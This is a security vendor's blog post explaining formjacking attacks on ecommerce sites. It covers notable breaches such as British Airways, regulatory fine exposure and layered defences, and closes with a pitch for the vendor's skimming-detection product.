Formjacking – How it can Affect your Ecommerce Site

Data theft or data skimming is not a new problem, it has probably been happening since the birth of the paper form. Today is no different, it is still around and happening on a much wider scale, leveraging the internet and the proliferation of online shopping.  

A popular modern tactic for data skimming is called formjacking.

Not heard of it? 

Formjacking enables organised criminals to steal sensitive customer data as it is entered into an ecommerce shop. To the end user, this process is invisible. Worse still, it is often invisible to the online store as well.

News stories mentioning formjacking are breaking on an almost daily basis. Interestingly, the affected organisations are well established, very credible and trusted brands who will have invested millions into a multi-layered, highly sophisticated IT security strategy. 

In 2018 British Airways famously had to admit to losing over 380,000 customer records. Soon after, the world’s leading ticketing site Ticketmaster had a similar incident. Github, the Wall Street Journal and Vision Direct had similar incidents. The list goes on. For me, it is the most relevant threat to ecommerce since the birth of the Distributed Denial of Service (DDOS) attack in the early 2000’s. 

So, here’s what you need to know about formjacking and how to protect your e-commerce website.

What is Formjacking?

Formjacking came to light in late 2018 in a series of data security bulletins from Symantec. Symantec describes formjacking as software that does in the virtual world what card skimmers do in the real world: Just as a skimmer steals personal data from your physical credit card at the moment you swipe it at a petrol station or ATM, a site infected with formjacking code captures your data as you submit it to an online order form. It’s then transmitted to data thieves.

Reports vary but an estimated 5,500 online stores get formjacked each month. That’s because formjacking is relatively easy to implement, hard to detect and provides a very lucrative revenue stream for the perpetrators.

In simple terms, all it takes is for the hacker to insert malicious javascript code into the ecommerce site. That javascript code captures any payment data that customers type into those fields and sends it to an external destination or host – all done in stealth, without disrupting the customers shopping experience.

The data that’s skimmed or stolen is then sold on the dark web. Figures vary but the data formjacked from the British Airways site has been reportedly sold for as much as $50 per record ($50 x 380,000 = $19,000,000).

What websites are at risk from formjackers?

Obviously large ecommerce brands are at risk but like other forms of cyber threat small to mid-size organisations are also targeted. This is because smaller businesses have fewer resources and security budgets, making them easier to infect. 

The sweet spot for the formjacking gangs are organisations that process large volumes of customer data. This allows the attacker to capture more personal information faster which in turn generates more revenue, faster.  

They also look for sites that utilise third-party javascript technology. Web chats, advertisements, marketing analytics tools (Google Analytics) all use embedded javascript technology. The more the better, as this increases the formjackers ability to camouflage themselves. Some sites have hundreds of third parties, all sending data to external destinations so it becomes increasing hard to spot the malicious imposter. 

Formjacking creates data breach liabilities

The security industry often mentions buyers deciding to use a competitive website due to negative press following a breach. Whilst I am sure this is true, speaking personally I am not convinced how strong an argument this is. It wouldn’t stop me, for example, using a large organisation such as British Airways. However it might make me look for an alternative further down the ecommerce food chain. 

The most tangible threat really comes in the form of legal fines and prosecutions. With increasingly strong regulations coming into force such as the GDPR and the imminent ePrivacy Regulation, organisations are more than ever, financially liable for data breaches. In the case of British Airways, the company was actually fortunate because the breach happened whilst the Data Protection Act was in place. This limited the fine to £183M. Had it happened under the GDPR the fine would be 4% of annual turnover – a figure nearer to £520M. 

How can you protect your website from formjacking?

This is a tough paragraph to write because preventing – even detecting – a formacking attack is very difficult. Like all security challenges, there is no silver bullet solution. It requires a layered defence in-depth approach that starts with basics like patching and vulnerability elimination. Javascript is stored on the server so a fully patched server with no vulnerabilities is going to have an immediate head start. In the BA attack – believe it or not – the attackers used a known vulnerability on a public-facing web server to get in. 

Some security experts suggest analysing firewall and server logs for suspicious activity. THis begs the question: who has the resources and time to monitor these types of logs consistently over time? Often with log management tools it is difficult to see the wood for the trees. 

Javascript obfuscation is another approach but it is only really a method for stopping an opportunistic attack. A determined attacker would circumvent this method (obfuscation) over time. The truth remains that javascript changes a great deal so maintaining any solution that is based on monitoring javascript is going to be difficult to manage and maintain. 

One way to spot a possible formjacking in progress is to look for data unexpectedly leaving your site. This is basically what we do at RapidSpike. We focus on where the browser is sending data and base our alerts on anomalies. The theory is that ultimately to steal data the hacker needs to send it somewhere. If that somewhere is new or abnormal then it should be flagged. 

The short answer is: all of the above 

Good old defence in-depth is the best approach but this isn’t cheap and requires time and relevant skills. This is a challenge for all sizes of organisations but one thing is for sure, formjacking is something we are all going to have to live with and constantly defend against.

Detect website skimming, formjacking and supply chain attacks. Easily protect against unauthorised changes to your critical JavaScript files with RapidSpike Magecart Detection.